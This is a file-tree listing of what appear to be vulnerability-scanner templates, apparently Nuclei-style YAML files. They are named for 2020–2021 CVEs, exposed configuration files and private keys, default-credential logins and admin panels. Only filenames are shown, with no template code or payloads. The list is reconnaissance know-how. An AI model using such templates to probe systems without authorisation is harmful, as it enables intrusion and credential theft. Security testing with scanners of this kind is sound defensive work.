├── CVE-2020-24949.yaml
├── CVE-2020-25078.yaml
├── CVE-2020-25213.yaml
├── CVE-2020-25495.yaml
├── CVE-2020-2551.yaml
├── CVE-2020-25540.yaml
├── CVE-2020-26073.yaml
├── CVE-2020-26153.yaml
├── CVE-2020-26214.yaml
├── CVE-2020-26413.yaml
├── CVE-2020-26948.yaml
├── CVE-2020-27361.yaml
├── CVE-2020-27735.yaml
├── CVE-2020-27866.yaml
├── CVE-2020-27982.yaml
├── CVE-2020-27986.yaml
├── CVE-2020-28208.yaml
├── CVE-2020-28351.yaml
├── CVE-2020-29164.yaml
├── CVE-2020-29227.yaml
├── CVE-2020-29395.yaml
├── CVE-2020-29453 (copy 1).yaml
├── CVE-2020-29453-1.yaml
├── CVE-2020-3187.yaml
├── CVE-2020-3452-1.yaml
├── CVE-2020-3452-2.yaml
├── CVE-2020-35338.yaml
├── CVE-2020-35476.yaml
├── CVE-2020-35489.yaml
├── CVE-2020-35580.yaml
├── CVE-2020-35598.yaml
├── CVE-2020-35729.yaml
├── CVE-2020-35736.yaml
├── CVE-2020-35774.yaml
├── CVE-2020-3580.yaml
├── CVE-2020-35846.yaml
├── CVE-2020-35847.yaml
├── CVE-2020-35848.yaml
├── CVE-2020-36112.yaml
├── CVE-2020-36289-1.yaml
├── CVE-2020-36289-2.yaml
├── CVE-2020-4463-1.yaml
├── CVE-2020-4463-2.yaml
├── CVE-2020-5284.yaml
├── CVE-2020-5307.yaml
├── CVE-2020-5405.yaml
├── CVE-2020-5410.yaml
├── CVE-2020-5412.yaml
├── CVE-2020-5776-1.yaml
├── CVE-2020-5776-2.yaml
├── CVE-2020-5777.yaml
├── CVE-2020-5847.yaml
├── CVE-2020-5902-1.yaml
├── CVE-2020-5902-2.yaml
├── CVE-2020-5902-3.yaml
├── CVE-2020-5902-4.yaml
├── CVE-2020-5902-5.yaml
├── CVE-2020-6171.yaml
├── CVE-2020-6207.yaml
├── CVE-2020-6287.yaml
├── CVE-2020-6637-1.yaml
├── CVE-2020-6637-2.yaml
├── CVE-2020-6637-3.yaml
├── CVE-2020-7209.yaml
├── CVE-2020-7318.yaml
├── CVE-2020-7961-1.yaml
├── CVE-2020-7961-2.yaml
├── CVE-2020-8091.yaml
├── CVE-2020-8115.yaml
├── CVE-2020-8163.yaml
├── CVE-2020-8191.yaml
├── CVE-2020-8194.yaml
├── CVE-2020-8209.yaml
├── CVE-2020-8512.yaml
├── CVE-2020-8515.yaml
├── CVE-2020-8641.yaml
├── CVE-2020-8771.yaml
├── CVE-2020-8982.yaml
├── CVE-2020-9036.yaml
├── CVE-2020-9047.yaml
├── CVE-2020-9054.yaml
├── CVE-2020-9315-1.yaml
├── CVE-2020-9315-2.yaml
├── CVE-2020-9344-1.yaml
├── CVE-2020-9344-2.yaml
├── CVE-2020-9344-3.yaml
├── CVE-2020-9344-4.yaml
├── CVE-2020-9344-5.yaml
├── CVE-2020-9376.yaml
├── CVE-2020-9402.yaml
├── CVE-2020-9425.yaml
├── CVE-2020-9483.yaml
├── CVE-2020-9484.yaml
├── CVE-2020-9496.yaml
├── CVE-2020-9757-1.yaml
├── CVE-2020-9757-2.yaml
├── CVE-2021-1499.yaml
├── CVE-2021-20090.yaml
├── CVE-2021-20114.yaml
├── CVE-2021-21234.yaml
├── CVE-2021-21307.yaml
├── CVE-2021-21315.yaml
├── CVE-2021-21389.yaml
├── CVE-2021-21402-1.yaml
├── CVE-2021-21402-2.yaml
├── CVE-2021-21479.yaml
├── CVE-2021-21801.yaml
├── CVE-2021-21802.yaml
├── CVE-2021-21803.yaml
├── CVE-2021-21816.yaml
├── CVE-2021-21972.yaml
├── CVE-2021-21975.yaml
├── CVE-2021-21978.yaml
├── CVE-2021-21985.yaml
├── CVE-2021-22122-1.yaml
├── CVE-2021-22122-2.yaml
├── CVE-2021-22145.yaml
├── CVE-2021-22873-1.yaml
├── CVE-2021-22873-2.yaml
├── CVE-2021-22873-3.yaml
├── CVE-2021-22873-4.yaml
├── CVE-2021-22873-5.yaml
├── CVE-2021-22873-6.yaml
├── CVE-2021-23241.yaml
├── CVE-2021-24146.yaml
├── CVE-2021-24176.yaml
├── CVE-2021-24210.yaml
├── CVE-2021-24226.yaml
├── CVE-2021-24235.yaml
├── CVE-2021-24237.yaml
├── CVE-2021-24274.yaml
├── CVE-2021-24275.yaml
├── CVE-2021-24276.yaml
├── CVE-2021-24285.yaml
├── CVE-2021-24288.yaml
├── CVE-2021-24291.yaml
├── CVE-2021-24298.yaml
├── CVE-2021-24316.yaml
├── CVE-2021-24320.yaml
├── CVE-2021-24335.yaml
├── CVE-2021-24340.yaml
├── CVE-2021-24342.yaml
├── CVE-2021-24364.yaml
├── CVE-2021-24387.yaml
├── CVE-2021-24389.yaml
├── CVE-2021-24406.yaml
├── CVE-2021-24407.yaml
├── CVE-2021-24495-1.yaml
├── CVE-2021-24495-2.yaml
├── CVE-2021-24498.yaml
├── CVE-2021-25281.yaml
├── CVE-2021-25646.yaml
├── CVE-2021-26084-1.yaml
├── CVE-2021-26084-10.yaml
├── CVE-2021-26084-11.yaml
├── CVE-2021-26084-12.yaml
├── CVE-2021-26084-13.yaml
├── CVE-2021-26084-2.yaml
├── CVE-2021-26084-3.yaml
├── CVE-2021-26084-4.yaml
├── CVE-2021-26084-5.yaml
├── CVE-2021-26084-6.yaml
├── CVE-2021-26084-7.yaml
├── CVE-2021-26084-8.yaml
├── CVE-2021-26084-9.yaml
├── CVE-2021-26086.yaml
├── CVE-2021-26295.yaml
├── CVE-2021-26475.yaml
├── CVE-2021-26710.yaml
├── CVE-2021-26722.yaml
├── CVE-2021-26723.yaml
├── CVE-2021-26812.yaml
├── CVE-2021-26855.yaml
├── CVE-2021-27132.yaml
├── CVE-2021-27330.yaml
├── CVE-2021-27561.yaml
├── CVE-2021-27651.yaml
├── CVE-2021-28073-1.yaml
├── CVE-2021-28073-2.yaml
├── CVE-2021-28149-1.yaml
├── CVE-2021-28149-2.yaml
├── CVE-2021-28150-1.yaml
├── CVE-2021-28150-2.yaml
├── CVE-2021-28151-1.yaml
├── CVE-2021-28151-2.yaml
├── CVE-2021-28164.yaml
├── CVE-2021-28169-1.yaml
├── CVE-2021-28169-2.yaml
├── CVE-2021-28854.yaml
├── CVE-2021-28918-1.yaml
├── CVE-2021-28918-2.yaml
├── CVE-2021-28918-3.yaml
├── CVE-2021-28937.yaml
├── CVE-2021-29156-1.yaml
├── CVE-2021-29156-2.yaml
├── CVE-2021-29156-3.yaml
├── CVE-2021-29203.yaml
├── CVE-2021-29442.yaml
├── CVE-2021-29484.yaml
├── CVE-2021-29622.yaml
├── CVE-2021-29625.yaml
├── CVE-2021-30049.yaml
├── CVE-2021-30151.yaml
├── CVE-2021-3017.yaml
├── CVE-2021-3019.yaml
├── CVE-2021-30461.yaml
├── CVE-2021-30497.yaml
├── CVE-2021-31249.yaml
├── CVE-2021-31250.yaml
├── CVE-2021-3129.yaml
├── CVE-2021-31537.yaml
├── CVE-2021-31581.yaml
├── CVE-2021-31602-1.yaml
├── CVE-2021-31602-2.yaml
├── CVE-2021-31682.yaml
├── CVE-2021-31856.yaml
├── CVE-2021-32030.yaml
├── CVE-2021-3223.yaml
├── CVE-2021-32820.yaml
├── CVE-2021-3297.yaml
├── CVE-2021-33044.yaml
├── CVE-2021-33221.yaml
├── CVE-2021-33564.yaml
├── CVE-2021-3374.yaml
├── CVE-2021-3377.yaml
├── CVE-2021-3378.yaml
├── CVE-2021-33807.yaml
├── CVE-2021-33904.yaml
├── CVE-2021-34370.yaml
├── CVE-2021-34429-1.yaml
├── CVE-2021-34429-2.yaml
├── CVE-2021-34473-1.yaml
├── CVE-2021-34473-2.yaml
├── CVE-2021-34621.yaml
├── CVE-2021-35265-1.yaml
├── CVE-2021-35265-2.yaml
├── CVE-2021-35336.yaml
├── CVE-2021-35464.yaml
├── CVE-2021-3654.yaml
├── CVE-2021-36749.yaml
├── CVE-2021-37216.yaml
├── CVE-2021-37538.yaml
├── CVE-2021-37573.yaml
├── CVE-2021-37704-1.yaml
├── CVE-2021-37704-2.yaml
├── CVE-2021-37833-1.yaml
├── CVE-2021-37833-2.yaml
├── CVE-2021-37833-3.yaml
├── CVE-2021-37833-4.yaml
├── CVE-2021-38314-1.yaml
├── CVE-2021-38314-2.yaml
├── CVE-2021-38647.yaml
├── CVE-2021-38702.yaml
├── CVE-2021-38704.yaml
├── CVE-2021-39316.yaml
├── CVE-2021-39320.yaml
├── CVE-2021-39327-1.yaml
├── CVE-2021-39327-2.yaml
├── CVE-2021-40539.yaml
├── CVE-2021-40868.yaml
├── CVE-2021-40875-1.yaml
├── CVE-2021-40875-2.yaml
├── CVE-2021-40960.yaml
├── CVE-2021-40978.yaml
├── CVE-2021-41174.yaml
├── CVE-2021-41291.yaml
├── CVE-2021-41293.yaml
├── CVE-2021-41381.yaml
├── CVE-2021-41467.yaml
├── CVE-2021-41648.yaml
├── CVE-2021-41649.yaml
├── CVE-2021-41773.yaml
├── CVE-2021-41826.yaml
├── CVE-2021-41878.yaml
├── CVE-2021-42013-1.yaml
├── CVE-2021-42013-2.yaml
├── CVE-2021-42258.yaml
├── CVE-2021-42565-1.yaml
├── CVE-2021-42565-2.yaml
├── CVE-2021-42566-1.yaml
├── CVE-2021-42566-2.yaml
└── CVE-2021-43287.yaml
├── Configuration-Files
├── access-log.yaml
├── airflow-configuration-exposure.yaml
├── alibaba-canal-info-leak.yaml
├── amazon-docker-config-disclosure.yaml
├── amazon-docker-config.yaml
├── ansible-config-disclosure.yaml
├── apache-config.yaml
├── appspec-yml-disclosure-1.yaml
├── appspec-yml-disclosure-2.yaml
├── awstats-config-1.yaml
├── awstats-config-2.yaml
├── awstats-script-1.yaml
├── awstats-script-2.yaml
├── awstats-script-3.yaml
├── axiom-digitalocean-key-exposure.yaml
├── axis-happyaxis-1.yaml
├── axis-happyaxis-2.yaml
├── axis-happyaxis-3.yaml
├── axis-happyaxis-4.yaml
├── bower-json.yaml
├── circleci-config.yaml
├── circleci-ssh-config.yaml
├── cisco-network-config.yaml
├── codeigniter-env-1.yaml
├── codeigniter-env-10.yaml
├── codeigniter-env-11.yaml
├── codeigniter-env-12.yaml
├── codeigniter-env-2.yaml
├── codeigniter-env-3.yaml
├── codeigniter-env-4.yaml
├── codeigniter-env-5.yaml
├── codeigniter-env-6.yaml
├── codeigniter-env-7.yaml
├── codeigniter-env-8.yaml
├── codeigniter-env-9.yaml
├── cold-fusion-cfcache-map.yaml
├── composer-config-1.yaml
├── composer-config-2.yaml
├── composer-config-3.yaml
├── composer-config-4.yaml
├── configuration-listing.yaml
├── coremail-config-disclosure.yaml
├── couchbase-buckets-api.yaml
├── crossdomain-xml.yaml
├── crossdomin-xml.yaml
├── darkstat-detect-1.yaml
├── darkstat-detect-2.yaml
├── db-schema-1.yaml
├── db-schema-2.yaml
├── db-schema-3.yaml
├── dbeaver-credentials.yaml
├── detect-drone-config.yaml
├── development-logs-1.yaml
├── development-logs-2.yaml
├── development-logs-3.yaml
├── django-debug-exposure.yaml
├── docker-compose-config-1.yaml
├── docker-compose-config-2.yaml
├── docker-compose-config-3.yaml
├── docker-compose-config-4.yaml
├── docker-compose-config-5.yaml
├── docker-compose-config-6.yaml
├── docker-compose-config-7.yaml
├── dockercfg-config-1.yaml
├── dockercfg-config-2.yaml
├── dockerfile-hidden-disclosure-1.yaml
├── dockerfile-hidden-disclosure-2.yaml
├── domcfg-page.yaml
├── drupal-install.yaml
├── ds_store.yaml
├── dwsync-exposure.yaml
├── elmah-log-file.yaml
├── error-logs-1.yaml
├── error-logs-10.yaml
├── error-logs-11.yaml
├── error-logs-12.yaml
├── error-logs-13.yaml
├── error-logs-14.yaml
├── error-logs-15.yaml
├── error-logs-16.yaml
├── error-logs-17.yaml
├── error-logs-18.yaml
├── error-logs-19.yaml
├── error-logs-2.yaml
├── error-logs-20.yaml
├── error-logs-21.yaml
├── error-logs-22.yaml
├── error-logs-23.yaml
├── error-logs-24.yaml
├── error-logs-25.yaml
├── error-logs-26.yaml
├── error-logs-27.yaml
├── error-logs-28.yaml
├── error-logs-3.yaml
├── error-logs-4.yaml
├── error-logs-5.yaml
├── error-logs-6.yaml
├── error-logs-7.yaml
├── error-logs-8.yaml
├── error-logs-9.yaml
├── esmtprc-config.yaml
├── exposed-alps-spring-1.yaml
├── exposed-alps-spring-2.yaml
├── exposed-alps-spring-3.yaml
├── exposed-authentication-asmx.yaml
├── exposed-bitkeeper.yaml
├── exposed-bzr.yaml
├── exposed-darcs.yaml
├── exposed-gitignore-1.yaml
├── exposed-gitignore-2.yaml
├── exposed-gitignore-3.yaml
├── exposed-glances-api.yaml
├── exposed-hg.yaml
├── exposed-prometheus-log.yaml
├── exposed-sharepoint-list.yaml
├── exposed-svn.yaml
├── exposed-vscode.yaml
├── filezilla-1.yaml
├── filezilla-2.yaml
├── filezilla-3.yaml
├── firebase-config-exposure-1.yaml
├── firebase-config-exposure-2.yaml
├── ftp-credentials-exposure.yaml
├── git-config-nginxoffbyslash-1.yaml
├── git-config-nginxoffbyslash-2.yaml
├── git-config-nginxoffbyslash-3.yaml
├── git-config-nginxoffbyslash-4.yaml
├── git-config-nginxoffbyslash-5.yaml
├── git-config-nginxoffbyslash-6.yaml
├── git-config-nginxoffbyslash-7.yaml
├── git-config-nginxoffbyslash-8.yaml
├── git-config-nginxoffbyslash-9.yaml
├── git-config.yaml
├── git-credentials-disclosure.yaml
├── github-gemfile-files-1.yaml
├── github-gemfile-files-2.yaml
├── github-page-config.yaml
├── github-workflows-disclosure-1.yaml
├── github-workflows-disclosure-10.yaml
├── github-workflows-disclosure-11.yaml
├── github-workflows-disclosure-12.yaml
├── github-workflows-disclosure-13.yaml
├── github-workflows-disclosure-14.yaml
├── github-workflows-disclosure-15.yaml
├── github-workflows-disclosure-16.yaml
├── github-workflows-disclosure-17.yaml
├── github-workflows-disclosure-18.yaml
├── github-workflows-disclosure-19.yaml
├── github-workflows-disclosure-2.yaml
├── github-workflows-disclosure-20.yaml
├── github-workflows-disclosure-21.yaml
├── github-workflows-disclosure-3.yaml
├── github-workflows-disclosure-4.yaml
├── github-workflows-disclosure-5.yaml
├── github-workflows-disclosure-6.yaml
├── github-workflows-disclosure-7.yaml
├── github-workflows-disclosure-8.yaml
├── github-workflows-disclosure-9.yaml
├── glpi-status-ldap-domain-disclosure-1.yaml
├── glpi-status-ldap-domain-disclosure-2.yaml
├── glpi-status-ldap-domain-disclosure-3.yaml
├── glpi-telemetry-disclosure-1.yaml
├── glpi-telemetry-disclosure-2.yaml
├── gmail-api-client-secrets.yaml
├── gogs-install-exposure.yaml
├── golang-metrics.yaml
├── gruntfile-exposure-1.yaml
├── gruntfile-exposure-2.yaml
├── hikvision-info-leak.yaml
├── honeywell-scada-config.yaml
├── hp-ilo-serial-key-disclosure.yaml
├── htpasswd-detection.yaml
├── httpd-config.yaml
├── iceflow-vpn-disclosure-1.yaml
├── iceflow-vpn-disclosure-2.yaml
├── iceflow-vpn-disclosure-3.yaml
├── iceflow-vpn-disclosure-4.yaml
├── iceflow-vpn-disclosure-5.yaml
├── iceflow-vpn-disclosure-6.yaml
├── iceflow-vpn-disclosure-7.yaml
├── iceflow-vpn-disclosure-8.yaml
├── idea-folder-exposure-1.yaml
├── idea-folder-exposure-2.yaml
├── idea-logs-exposure-1.yaml
├── idea-logs-exposure-2.yaml
├── ioncube-loader-wizard-1.yaml
├── ioncube-loader-wizard-2.yaml
├── javascript-env-1.yaml
├── javascript-env-2.yaml
├── javascript-env-3.yaml
├── javascript-env-4.yaml
├── javascript-env-5.yaml
├── javascript-env-6.yaml
├── jboss-seam-debug-page.yaml
├── jetbrains-datasources.yaml
├── joomla-config-file.yaml
├── joomla-file-listing.yaml
├── keycloak-json.yaml
├── keycloak-openid-config-1.yaml
├── keycloak-openid-config-2.yaml
├── kubernetes-kustomization-disclosure.yaml
├── kyan-credential-exposure.yaml
├── kyan-network-credentials-disclosure.yaml
├── laravel-log-file.yaml
├── laravel-telescope.yaml
├── lazy-file.yaml
├── lucee-stack-trace.yaml
├── lvmeng-uts-disclosure.yaml
├── magento-config-1.yaml
├── magento-config-2.yaml
├── nagios-status-page-1.yaml
├── nagios-status-page-2.yaml
├── nagios-status-page-3.yaml
├── netrc-1.yaml
├── netrc-2.yaml
├── nginx-config.yaml
├── npm-log-file.yaml
├── opcache-status-exposure-1.yaml
├── opcache-status-exposure-2.yaml
├── opcache-status-exposure-3.yaml
├── oracle-ebs-credentials-disclosure.yaml
├── oracle-ebs-credentials.yaml
├── oracle-ebs-sqllog-disclosure.yaml
├── owncloud-config.yaml
├── package-json-1.yaml
├── package-json-2.yaml
├── perl-status.yaml
├── phalcon-framework-source.yaml
├── php-debug-bar.yaml
├── php-fpm-config.yaml
├── php-user-ini-disclosure-1.yaml
├── php-user-ini-disclosure-2.yaml
├── php-warning.yaml
├── phpinfo-1.yaml
├── phpinfo-10.yaml
├── phpinfo-11.yaml
├── phpinfo-12.yaml
├── phpinfo-13.yaml
├── phpinfo-14.yaml
├── phpinfo-15.yaml
├── phpinfo-16.yaml
├── phpinfo-17.yaml
├── phpinfo-2.yaml
├── phpinfo-3.yaml
├── phpinfo-4.yaml
├── phpinfo-5.yaml
├── phpinfo-6.yaml
├── phpinfo-7.yaml
├── phpinfo-8.yaml
├── phpinfo-9.yaml
├── phpunit.yaml
├── plesk-stat.yaml
├── production-logs-1.yaml
├── production-logs-2.yaml
├── production-logs-3.yaml
├── proftpd-config.yaml
├── prometheus-config-endpoint.yaml
├── prometheus-flags-endpoint.yaml
├── prometheus-targets-endpoint.yaml
├── putty-private-key-disclosure.yaml
├── pyproject-disclosure.yaml
├── pyramid-debug-toolbar.yaml
├── rails-database-config.yaml
├── rails-debug-mode.yaml
├── rails-secret-token-disclosure.yaml
├── robomongo-credential-1.yaml
├── robomongo-credential-2.yaml
├── roundcube-log-disclosure-1.yaml
├── roundcube-log-disclosure-2.yaml
├── ruby-on-rails-secret-token-disclosure.yaml
├── ruijie-information-disclosure.yaml
├── ruijie-nbr1300g-exposure.yaml
├── ruijie-phpinfo.yaml
├── s3cmd-config.yaml
├── saia-web-server-info.yaml
├── samba-config.yaml
├── sensitive-storage-data-exposure-1.yaml
├── sensitive-storage-data-exposure-2.yaml
├── sensitive-storage-data-exposure-3.yaml
├── sensitive-storage-data-exposure-4.yaml
├── sensitive-storage-data-exposure-5.yaml
├── sensitive-storage-data-exposure-6.yaml
├── sensitive-storage-exposure-1.yaml
├── sensitive-storage-exposure-2.yaml
├── sensitive-storage-exposure-3.yaml
├── sensitive-storage-exposure-4.yaml
├── sensitive-storage-exposure-5.yaml
├── sensitive-storage-exposure-6.yaml
├── server-private-keys-1.yaml
├── server-private-keys-10.yaml
├── server-private-keys-11.yaml
├── server-private-keys-12.yaml
├── server-private-keys-13.yaml
├── server-private-keys-14.yaml
├── server-private-keys-15.yaml
├── server-private-keys-16.yaml
├── server-private-keys-17.yaml
├── server-private-keys-18.yaml
├── server-private-keys-19.yaml
├── server-private-keys-2.yaml
├── server-private-keys-20.yaml
├── server-private-keys-3.yaml
├── server-private-keys-4.yaml
├── server-private-keys-5.yaml
├── server-private-keys-6.yaml
├── server-private-keys-7.yaml
├── server-private-keys-8.yaml
├── server-private-keys-9.yaml
├── sftp-credentials-exposure-1.yaml
├── sftp-credentials-exposure-2.yaml
├── shellscripts-1.yaml
├── shellscripts-10.yaml
├── shellscripts-11.yaml
├── shellscripts-12.yaml
├── shellscripts-13.yaml
├── shellscripts-14.yaml
├── shellscripts-15.yaml
├── shellscripts-16.yaml
├── shellscripts-17.yaml
├── shellscripts-2.yaml
├── shellscripts-3.yaml
├── shellscripts-4.yaml
├── shellscripts-5.yaml
├── shellscripts-6.yaml
├── shellscripts-7.yaml
├── shellscripts-8.yaml
├── shellscripts-9.yaml
├── snyk-ignore-file-disclosure.yaml
├── squid-analysis-report-generator.yaml
├── ssh-authorized-keys-1.yaml
├── ssh-authorized-keys-2.yaml
├── ssh-known-hosts-1.yaml
├── ssh-known-hosts-2.yaml
├── struts-debug-mode.yaml
├── struts-problem-report.yaml
├── svnserve-config.yaml
├── syfmony-profiler-1.yaml
├── syfmony-profiler-2.yaml
├── symfony-database-config.yaml
├── symfony-profiler.yaml
├── symfony-security-config-1.yaml
├── symfony-security-config-2.yaml
├── thumbs-db-disclosure.yaml
├── trace-axd-detect.yaml
├── tugboat-config-exposure.yaml
├── web-config.yaml
├── wp-app-log.yaml
├── wpconfig-aws-keys-1.yaml
├── wpconfig-aws-keys-2.yaml
├── xprober-service.yaml
├── yarn-lock.yaml
├── yii-debugger-1.yaml
├── yii-debugger-2.yaml
├── yii-debugger-3.yaml
├── yii-debugger-4.yaml
├── yii-debugger-5.yaml
├── zend-config-file.yaml
├── zm-system-log-detect-1.yaml
└── zm-system-log-detect-2.yaml
├── Default-Login
├── activemq-default-login.yaml
├── adobe-aem-default-credentials-1.yaml
├── adobe-aem-default-credentials-10.yaml
├── adobe-aem-default-credentials-2.yaml
├── adobe-aem-default-credentials-3.yaml
├── adobe-aem-default-credentials-4.yaml
├── adobe-aem-default-credentials-5.yaml
├── adobe-aem-default-credentials-6.yaml
├── adobe-aem-default-credentials-7.yaml
├── adobe-aem-default-credentials-8.yaml
├── adobe-aem-default-credentials-9.yaml
├── alibaba-canal-default-password.yaml
├── alphaweb-default-login.yaml
├── ambari-default-credentials.yaml
├── ambari-default-login.yaml
├── arl-default-login.yaml
├── arl-default-password.yaml
├── axis2-default-login-1.yaml
├── axis2-default-login-2.yaml
├── axis2-default-password-1.yaml
├── axis2-default-password-2.yaml
├── azkaban-default-login.yaml
├── azkaban-web-client-default-creds.yaml
├── businessintelligence-default-login.yaml
├── canal-default-login.yaml
├── chinaunicom-default-login.yaml
├── chinaunicom-modem-default-credentials.yaml
├── cs141-default-login-1.yaml
├── cs141-default-login-2.yaml
├── cs141-default-login-3.yaml
├── dell-emc-ecom-default-credentials.yaml
├── dell-idrac-default-login.yaml
├── dell-idrac9-default-login.yaml
├── druid-default-login-1.yaml
├── druid-default-login-2.yaml
├── druid-default-password-1.yaml
├── druid-default-password-2.yaml
├── emcecom-default-login.yaml
├── exacqvision-default-login.yaml
├── flir-ax8-default-credentials.yaml
├── flir-default-login.yaml
├── frp-default-credentials.yaml
├── frp-default-login.yaml
├── gitlab-weak-login-1.yaml
├── gitlab-weak-login-2.yaml
├── gitlab-weak-login-3.yaml
├── gitlab-weak-login-4.yaml
├── google-earth-dlogin.yaml
├── grafana-default-credential-1.yaml
├── grafana-default-credential-2.yaml
├── grafana-default-login-1.yaml
├── grafana-default-login-2.yaml
├── guacamole-default-login.yaml
├── hongdian-default-login-1.yaml
├── hongdian-default-login-2.yaml
├── hongdian-default-password-1.yaml
├── hongdian-default-password-2.yaml
├── hortonworks-smartsense-default-credentials.yaml
├── hp-switch-default-login.yaml
├── idemia-biometrics-default-credentials.yaml
├── idemia-biometrics-default-login.yaml
├── micro-focus-ucmdb-default-credentials.yaml
├── minio-default-login-1.yaml
├── minio-default-login-2.yaml
├── minio-default-password-1.yaml
├── minio-default-password-2.yaml
├── nagios-default-credential.yaml
├── nagios-default-login.yaml
├── nexus-default-login.yaml
├── nexus-default-password.yaml
├── nps-default-login.yaml
├── nps-default-password.yaml
├── ofbiz-default-credentials.yaml
├── ofbiz-default-login.yaml
├── oracle-bi-default-credentials.yaml
├── panabit-default-login.yaml
├── panabit-default-password.yaml
├── panos-default-credentials.yaml
├── panos-default-login.yaml
├── pentaho-default-login.yaml
├── rabbitmq-default-admin.yaml
├── rabbitmq-default-login.yaml
├── ricoh-weak-password.yaml
├── rockmongo-default-credentials.yaml
├── rockmongo-default-login.yaml
├── samsung-wlan-ap-default-credentials.yaml
├── samsung-wlan-default-login.yaml
├── seeddms-default-login.yaml
├── showdoc-default-login.yaml
├── showdoc-default-password.yaml
├── smartsense-default-login.yaml
├── solarwinds-default-admin-1.yaml
├── solarwinds-default-admin-2.yaml
├── solarwinds-default-login-1.yaml
├── solarwinds-default-login-2.yaml
├── spectracom-default-credential.yaml
├── spectracom-default-login.yaml
├── szhe-default-login.yaml
├── szhe-default-password.yaml
├── tomcat-manager-default-1.yaml
├── tomcat-manager-default-10.yaml
├── tomcat-manager-default-11.yaml
├── tomcat-manager-default-12.yaml
├── tomcat-manager-default-13.yaml
├── tomcat-manager-default-14.yaml
├── tomcat-manager-default-15.yaml
├── tomcat-manager-default-16.yaml
├── tomcat-manager-default-2.yaml
├── tomcat-manager-default-3.yaml
├── tomcat-manager-default-4.yaml
├── tomcat-manager-default-5.yaml
├── tomcat-manager-default-6.yaml
├── tomcat-manager-default-7.yaml
├── tomcat-manager-default-8.yaml
├── tomcat-manager-default-9.yaml
├── trilithic-viewpoint-default.yaml
├── trilithic-viewpoint-login.yaml
├── ucmdb-default-login.yaml
├── visionhub-default-credentials.yaml
├── visionhub-default-login.yaml
├── wifisky-default-login.yaml
├── wifisky-default-password.yaml
├── wso2-default-login.yaml
├── wso2-default-password.yaml
├── xxljob-default-login.yaml
├── zabbix-default-credentials.yaml
├── zabbix-default-login.yaml
├── zmanda-default-credential.yaml
└── zmanda-default-login.yaml
├── Exposed-Panels
├── 3g-wireless-gateway.yaml
├── active-admin-exposure.yaml
├── activemq-panel.yaml
├── acunetix-panel.yaml
├── adiscon-loganalyzer.yaml
├── adminer-panel-1.yaml
├── adminer-panel-2.yaml
├── adminer-panel-3.yaml
├── adminer-panel-4.yaml
├── adminer-panel-5.yaml
├── adminer-panel-6.yaml
├── adminer-panel-7.yaml
├── adobe-component-login-1.yaml
├── adobe-component-login-2.yaml
├── adobe-connect-central-login.yaml
├── adobe-experience-manager-login.yaml
├── adobe-media-server.yaml
├── advance-setup.yaml
├── aims-password-mgmt-client.yaml
├── aims-password-portal.yaml
├── airflow-panel.yaml
├── akamai-cloudtest.yaml
├── alienvault-usm.yaml
├── ambari-exposure.yaml
├── amcrest-login.yaml
├── ansible-tower-exposure.yaml
├── apiman-panel.yaml
├── atlassian-crowd-panel.yaml
├── avtech-dvr-exposure.yaml
├── azkaban-web-client.yaml
├── bazarr-login.yaml
├── bitrix-panel.yaml
├── blue-iris-login.yaml
├── calendarix-panel-1.yaml
├── calendarix-panel-2.yaml
├── call-break-cms.yaml
├── camunda-login-panel-1.yaml
├── camunda-login-panel-2.yaml
├── cerebro-panel.yaml
├── checkmarx-panel.yaml
├── checkpoint-panel-1.yaml
├── checkpoint-panel-2.yaml
├── circarlife-setup.yaml
├── cisco-ace-device-manager.yaml
├── cisco-asa-panel.yaml
├── cisco-edge-340.yaml
├── cisco-finesse-login.yaml
├── cisco-integrated-login.yaml
├── cisco-meraki-exposure.yaml
├── cisco-prime-infrastructure.yaml
├── cisco-sd-wan.yaml
├── cisco-secure-cn.yaml
├── cisco-secure-desktop.yaml
├── cisco-security-details.yaml
├── cisco-sendgrid.yaml
├── cisco-systems-login.yaml
├── cisco-telepresence.yaml
├── citrix-adc-gateway-detect-1.yaml
├── citrix-adc-gateway-detect-2.yaml
├── citrix-vpn-detect.yaml
├── clave-login-panel.yaml
├── clearpass-policy-manager.yaml
├── cloudphysician-radar.yaml
├── codemeter-webadmin-panel.yaml
├── coldfusion-administrator-login.yaml
├── compal-panel.yaml
├── contentkeeper-detect.yaml
├── cortex-xsoar-login.yaml
├── couchdb-exposure.yaml
├── couchdb-fauxton.yaml
├── crush-ftp-login.yaml
├── crxde-lite.yaml
├── csod-panel.yaml
├── cx-cloud-login-1.yaml
├── cx-cloud-login-2.yaml
├── d-link-wireless.yaml
├── dell-openmanager-login-1.yaml
├── dell-openmanager-login-2.yaml
├── dell-wyse-login.yaml
├── dell-wyse-management-suite-login.yaml
├── dericam-login.yaml
├── django-admin-panel.yaml
├── dotcms-admin-panel.yaml
├── druid-console-exposure.yaml
├── ems-login-panel.yaml
├── entrust-identityguard-1.yaml
├── entrust-identityguard-2.yaml
├── epson-access-detect.yaml
├── epson-unauthorized-access-detect.yaml
├── epson-web-control-detect.yaml
├── exposed-nomad.yaml
├── exposed-pagespeed-global-admin.yaml
├── exposed-webalizer.yaml
├── exsi-system.yaml
├── f-secure-policy-manager.yaml
├── faraday-login.yaml
├── fiorilaunchpad-logon.yaml
├── fireware-xtm-user-authentication.yaml
├── flink-exposure.yaml
├── forcepoint-applicance.yaml
├── forcepoint.yaml
├── fortinet-fortigate-panel.yaml
├── fortiweb-panel.yaml
├── getsimple-installation.yaml
├── github-enterprise-detect.yaml
├── gitlab-detect.yaml
├── globalprotect-panel-1.yaml
├── globalprotect-panel-2.yaml
├── glpi-authentication.yaml
├── glpi-login-1.yaml
├── glpi-login-2.yaml
├── go-anywhere-client.yaml
├── gocd-login.yaml
├── grafana-detect.yaml
├── grails-database-admin-console-1.yaml
├── grails-database-admin-console-2.yaml
├── gxd5-pacs-connexion-utilisateur.yaml
├── hadoop-exposure.yaml
├── hitron-technologies.yaml
├── hivemanager-login-panel.yaml
├── hmc-hybris-panel-1.yaml
├── hmc-hybris-panel-2.yaml
├── honeywell-web-controller.yaml
├── hp-ilo-5.yaml
├── hp-service-manager-1.yaml
├── hp-service-manager-2.yaml
├── hpe-system-management-login.yaml
├── ibm-advanced-system-management.yaml
├── ibm-note-login-1.yaml
├── ibm-note-login-2.yaml
├── ibm-security-access-manager.yaml
├── ibm-service-assistant.yaml
├── icinga-web-login.yaml
├── identity-services-engine-1.yaml
├── identity-services-engine-2.yaml
├── identityguard-selfservice-entrust.yaml
├── intelbras-login.yaml
├── iomega-emc-shared-nas.yaml
├── iomega-lenovo-emc-shared-nas-detect.yaml
├── iptime-router.yaml
├── itop-panel-1.yaml
├── itop-panel-2.yaml
├── jenkins-api-panel.yaml
